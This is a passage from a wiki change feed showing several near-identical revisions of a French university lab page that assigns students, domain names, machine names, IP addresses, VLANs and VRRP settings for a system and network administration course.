| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || rs7.online|| SE4.RS7||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.shop|| SE4.Elf||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || deadpool.tech|| SE4.catwoman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI &amp;amp; Agathe HOUDUSSE&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI &amp;amp; Marin GOURVEST&lt;br /&gt;
|-&lt;br /&gt;
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET &amp;amp; Thomas DELOBELLE&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI &amp;amp; Yassine YAHIANI &lt;br /&gt;
|-&lt;br /&gt;
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE &amp;amp; Tom MERIEN&lt;br /&gt;
|-&lt;br /&gt;
| SE4.superman|| 193.48.57.169|| Billel Cheklat &amp;amp; Antonin Biernacki&lt;br /&gt;
|-&lt;br /&gt;
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse &amp;amp; GAUTHIER Mario Sylainx S.&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Solstice|| &amp;lt;code&amp;gt;193.48.57.167&amp;lt;/code&amp;gt;|| Mohamed Salhi &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des commutateurs virtuels =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé &lt;br /&gt;
|-&lt;br /&gt;
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24&lt;br /&gt;
|-&lt;br /&gt;
|PAYET / DELOBELLE&lt;br /&gt;
|pont_pacman&lt;br /&gt;
|192.168.10.0/24&lt;br /&gt;
|-&lt;br /&gt;
|MERIEN / VANGHELUWE&lt;br /&gt;
|pont_pere&lt;br /&gt;
|192.168.0.0/24&lt;br /&gt;
|-&lt;br /&gt;
|CHEKLAT / BIERNACKI&lt;br /&gt;
|pont_ironman&lt;br /&gt;
|192.168.69.0/24&lt;br /&gt;
|-&lt;br /&gt;
|SALHI&lt;br /&gt;
|pont_msalhi&lt;br /&gt;
|192.168.20.0/24&lt;br /&gt;
|-&lt;br /&gt;
|GOURVEST/GHAZALI&lt;br /&gt;
|pont_diviseur&lt;br /&gt;
|192.168.67.0/24&lt;br /&gt;
|-&lt;br /&gt;
|YAHIANI / TEPELI&lt;br /&gt;
|pontclio&lt;br /&gt;
|192.168.7.0/24&lt;br /&gt;
|-&lt;br /&gt;
|GAUTHIER / SOUOP METSE&lt;br /&gt;
|pont_rock&lt;br /&gt;
|192.168.50.0/24&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des réseaux virtuels =&lt;br /&gt;
&lt;br /&gt;
VLAN privés :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
| VLAN1 || 1&lt;br /&gt;
|-&lt;br /&gt;
| MV-PROMO || 2 &lt;br /&gt;
|-&lt;br /&gt;
|E1-Pierre&lt;br /&gt;
|11&lt;br /&gt;
|-&lt;br /&gt;
|E2-Agathe&lt;br /&gt;
|12&lt;br /&gt;
|-&lt;br /&gt;
|E5-Cedric&lt;br /&gt;
|15&lt;br /&gt;
|-&lt;br /&gt;
|E6-Thomas&lt;br /&gt;
|16&lt;br /&gt;
|-&lt;br /&gt;
|E9-Aurele&lt;br /&gt;
|19&lt;br /&gt;
|-&lt;br /&gt;
|E10-Tom&lt;br /&gt;
|20&lt;br /&gt;
|-&lt;br /&gt;
|E15-MSalhi&lt;br /&gt;
|25&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
VLAN communs avec l'école :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
| INTERCO1 || 530 &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Schéma de câblage =&lt;br /&gt;
&lt;br /&gt;
Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.&lt;br /&gt;
&lt;br /&gt;
= Plan d'adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6 &lt;br /&gt;
|-&lt;br /&gt;
| MV-PROMO || &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; || &amp;lt;/code&amp;gt;2001:660:4401:60a0::/64&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| PoolPierre || &amp;lt;code&amp;gt;10.60.1.0/24&amp;lt;/code&amp;gt; || &amp;lt;/code&amp;gt;2001:660:4401:60a1::/64&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| PoolAgathe || &amp;lt;code&amp;gt;10.60.2.0/24&amp;lt;/code&amp;gt; || &amp;lt;/code&amp;gt;2001:660:4401:60a2::/64&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|PoolCédric&lt;br /&gt;
|&amp;lt;code&amp;gt;10.60.5.0/24&amp;lt;/code&amp;gt;&lt;br /&gt;
|2001:660:4401:60a5::/64&lt;br /&gt;
|-&lt;br /&gt;
|PoolThomas&lt;br /&gt;
|&amp;lt;code&amp;gt;10.60.6.0/24&amp;lt;/code&amp;gt;&lt;br /&gt;
|2001:660:4401:60a6::/64&lt;br /&gt;
|-&lt;br /&gt;
|PoolSalhi&lt;br /&gt;
|10.60.15.0/24&lt;br /&gt;
|2001:660:4401:60b1::/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Adresses IPv4 des éléments réseau dans VLAN1&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Elément !! Adresse &lt;br /&gt;
|-&lt;br /&gt;
| Routeur C9200-E304 || 172.27.0.1/16&lt;br /&gt;
|-&lt;br /&gt;
| Routeur C9200-E306 || 172.27.0.2/16&lt;br /&gt;
|-&lt;br /&gt;
| Borne Wi-Fi E306 || 172.27.0.3/16&lt;br /&gt;
|-&lt;br /&gt;
| Borne Wi-Fi E304 || 172.27.0.4/16&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Informations VRRP =&lt;br /&gt;
&lt;br /&gt;
Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.&lt;br /&gt;
&lt;br /&gt;
== VLAN des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Une seule instance VRRP dans le VLAN des machines virtuelles.&lt;br /&gt;
&lt;br /&gt;
Adresse IPv4 virtuelle : &amp;lt;code&amp;gt;193.48.57.162&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Routeur !! IPv4 propre &lt;br /&gt;
|-&lt;br /&gt;
| C9200 E304 || &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&lt;br /&gt;
|- &lt;br /&gt;
| C9200 E306 || &amp;lt;code&amp;gt;193.48.57.164&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== VLAN ... ==&lt;/div&gt;</summary>
		<author><name>Msalhi</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=12140</id>
		<title>SE4 IdO sécurité système/réseau 2025/2026</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=12140"/>
		<updated>2026-02-10T13:59:26Z</updated>

		<summary type="html">&lt;p&gt;Msalhi : /* Tableau des réseaux virtuels */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Répartition des binômes pour les travaux pratiques &amp;quot;administration système et réseau&amp;quot; =&lt;br /&gt;
&lt;br /&gt;
Préfixe des noms de machine : &amp;lt;code&amp;gt;SE4&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Domaines Internet à louer sur [[gandi.net]]. Identifiant &amp;lt;code&amp;gt;pifou&amp;lt;/code&amp;gt;. Regardez le montant prévu sur le compte avant de louer un domaine.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elève !! Nom de domaine&lt;br /&gt;
! Nom de machine de services !! Nom de machine mandataire&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinuxbtw.lol|| SE4.CachyOS||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || c2vts.fr|| SE4.C2||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || rs7.online|| SE4.RS7||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.shop|| SE4.Elf||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || deadpool.tech|| SE4.catwoman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI &amp;amp; Agathe HOUDUSSE&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI &amp;amp; Marin GOURVEST&lt;br /&gt;
|-&lt;br /&gt;
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET &amp;amp; Thomas DELOBELLE&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI &amp;amp; Yassine YAHIANI &lt;br /&gt;
|-&lt;br /&gt;
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE &amp;amp; Tom MERIEN&lt;br /&gt;
|-&lt;br /&gt;
| SE4.superman|| 193.48.57.169|| Billel Cheklat &amp;amp; Antonin Biernacki&lt;br /&gt;
|-&lt;br /&gt;
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse &amp;amp; GAUTHIER Mario Sylainx S.&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Solstice|| &amp;lt;code&amp;gt;193.48.57.167&amp;lt;/code&amp;gt;|| Mohamed Salhi &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des commutateurs virtuels =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé &lt;br /&gt;
|-&lt;br /&gt;
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24&lt;br /&gt;
|-&lt;br /&gt;
|PAYET / DELOBELLE&lt;br /&gt;
|pont_pacman&lt;br /&gt;
|192.168.10.0/24&lt;br /&gt;
|-&lt;br /&gt;
|MERIEN / VANGHELUWE&lt;br /&gt;
|pont_pere&lt;br /&gt;
|192.168.0.0/24&lt;br /&gt;
|-&lt;br /&gt;
|CHEKLAT / BIERNACKI&lt;br /&gt;
|pont_ironman&lt;br /&gt;
|192.168.69.0/24&lt;br /&gt;
|-&lt;br /&gt;
|SALHI&lt;br /&gt;
|pont_msalhi&lt;br /&gt;
|192.168.20.0/24&lt;br /&gt;
|-&lt;br /&gt;
|GOURVEST/GHAZALI&lt;br /&gt;
|pont_diviseur&lt;br /&gt;
|192.168.67.0/24&lt;br /&gt;
|-&lt;br /&gt;
|YAHIANI / TEPELI&lt;br /&gt;
|pontclio&lt;br /&gt;
|192.168.7.0/24&lt;br /&gt;
|-&lt;br /&gt;
|GAUTHIER / SOUOP METSE&lt;br /&gt;
|pont_rock&lt;br /&gt;
|192.168.50.0/24&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des réseaux virtuels =&lt;br /&gt;
&lt;br /&gt;
VLAN privés :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
| VLAN1 || 1&lt;br /&gt;
|-&lt;br /&gt;
| MV-PROMO || 2 &lt;br /&gt;
|-&lt;br /&gt;
|E1_Pierre&lt;br /&gt;
|11&lt;br /&gt;
|-&lt;br /&gt;
|E2_Agathe&lt;br /&gt;
|12&lt;br /&gt;
|-&lt;br /&gt;
|E15_MSalhi&lt;br /&gt;
|25&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
VLAN communs avec l'école :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
| INTERCO1 || 530 &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Schéma de câblage =&lt;br /&gt;
&lt;br /&gt;
Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.&lt;br /&gt;
&lt;br /&gt;
= Plan d'adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6 &lt;br /&gt;
|-&lt;br /&gt;
| MV-PROMO || &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; || &amp;lt;/code&amp;gt;2001:660:4401:60a0::/64&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Adresses IPv4 des éléments réseau dans VLAN1&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Elément !! Adresse &lt;br /&gt;
|-&lt;br /&gt;
| Routeur C9200-E304 || 172.27.0.1/16&lt;br /&gt;
|-&lt;br /&gt;
| Routeur C9200-E306 || 172.27.0.2/16&lt;br /&gt;
|-&lt;br /&gt;
| Borne Wi-Fi E306 || 172.27.0.3/16&lt;br /&gt;
|-&lt;br /&gt;
| Borne Wi-Fi E304 || 172.27.0.4/16&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Informations VRRP =&lt;br /&gt;
&lt;br /&gt;
Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.&lt;br /&gt;
&lt;br /&gt;
== VLAN des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Une seule instance VRRP dans le VLAN des machines virtuelles.&lt;br /&gt;
&lt;br /&gt;
Adresse IPv4 virtuelle : &amp;lt;code&amp;gt;193.48.57.162&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Routeur !! IPv4 propre &lt;br /&gt;
|-&lt;br /&gt;
| C9200 E304 || &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&lt;br /&gt;
|- &lt;br /&gt;
| C9200 E306 || &amp;lt;code&amp;gt;193.48.57.164&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== VLAN ... ==&lt;/div&gt;</summary>
		<author><name>Msalhi</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=12139</id>
		<title>SE4 IdO sécurité système/réseau 2025/2026</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=12139"/>
		<updated>2026-02-10T13:52:50Z</updated>

		<summary type="html">&lt;p&gt;Msalhi : /* Tableau des réseaux virtuels */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Répartition des binômes pour les travaux pratiques &amp;quot;administration système et réseau&amp;quot; =&lt;br /&gt;
&lt;br /&gt;
Préfixe des noms de machine : &amp;lt;code&amp;gt;SE4&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Domaines Internet à louer sur [[gandi.net]]. Identifiant &amp;lt;code&amp;gt;pifou&amp;lt;/code&amp;gt;. Regardez le montant prévu sur le compte avant de louer un domaine.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elève !! Nom de domaine&lt;br /&gt;
! Nom de machine de services !! Nom de machine mandataire&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinuxbtw.lol|| SE4.CachyOS||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || c2vts.fr|| SE4.C2||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || rs7.online|| SE4.RS7||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.shop|| SE4.Elf||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || deadpool.tech|| SE4.catwoman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI &amp;amp; Agathe HOUDUSSE&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI &amp;amp; Marin GOURVEST&lt;br /&gt;
|-&lt;br /&gt;
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET &amp;amp; Thomas DELOBELLE&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI &amp;amp; Yassine YAHIANI &lt;br /&gt;
|-&lt;br /&gt;
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE &amp;amp; Tom MERIEN&lt;br /&gt;
|-&lt;br /&gt;
| SE4.superman|| 193.48.57.169|| Billel Cheklat &amp;amp; Antonin Biernacki&lt;br /&gt;
|-&lt;br /&gt;
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse &amp;amp; GAUTHIER Mario Sylainx S.&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Solstice|| &amp;lt;code&amp;gt;193.48.57.167&amp;lt;/code&amp;gt;|| Mohamed Salhi &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des commutateurs virtuels =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé &lt;br /&gt;
|-&lt;br /&gt;
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24&lt;br /&gt;
|-&lt;br /&gt;
|PAYET / DELOBELLE&lt;br /&gt;
|pont_pacman&lt;br /&gt;
|192.168.10.0/24&lt;br /&gt;
|-&lt;br /&gt;
|MERIEN / VANGHELUWE&lt;br /&gt;
|pont_pere&lt;br /&gt;
|192.168.0.0/24&lt;br /&gt;
|-&lt;br /&gt;
|CHEKLAT / BIERNACKI&lt;br /&gt;
|pont_ironman&lt;br /&gt;
|192.168.69.0/24&lt;br /&gt;
|-&lt;br /&gt;
|SALHI&lt;br /&gt;
|pont_msalhi&lt;br /&gt;
|192.168.20.0/24&lt;br /&gt;
|-&lt;br /&gt;
|GOURVEST/GHAZALI&lt;br /&gt;
|pont_diviseur&lt;br /&gt;
|192.168.67.0/24&lt;br /&gt;
|-&lt;br /&gt;
|YAHIANI / TEPELI&lt;br /&gt;
|pontclio&lt;br /&gt;
|192.168.7.0/24&lt;br /&gt;
|-&lt;br /&gt;
|GAUTHIER / SOUOP METSE&lt;br /&gt;
|pont_rock&lt;br /&gt;
|192.168.50.0/24&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des réseaux virtuels =&lt;br /&gt;
&lt;br /&gt;
VLAN privés :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
| VLAN1 || 1&lt;br /&gt;
|-&lt;br /&gt;
| MV-PROMO || 2 &lt;br /&gt;
|-&lt;br /&gt;
|E1_Pierre&lt;br /&gt;
|11&lt;br /&gt;
|-&lt;br /&gt;
|E2_Agathe&lt;br /&gt;
|12&lt;br /&gt;
|-&lt;br /&gt;
|E15_MSalhi&lt;br /&gt;
|13&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
VLAN communs avec l'école :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
| INTERCO1 || 530 &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Schéma de câblage =&lt;br /&gt;
&lt;br /&gt;
Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.&lt;br /&gt;
&lt;br /&gt;
= Plan d'adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6 &lt;br /&gt;
|-&lt;br /&gt;
| MV-PROMO || &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; || &amp;lt;/code&amp;gt;2001:660:4401:60a0::/64&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Adresses IPv4 des éléments réseau dans VLAN1&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Elément !! Adresse &lt;br /&gt;
|-&lt;br /&gt;
| Routeur C9200-E304 || 172.27.0.1/16&lt;br /&gt;
|-&lt;br /&gt;
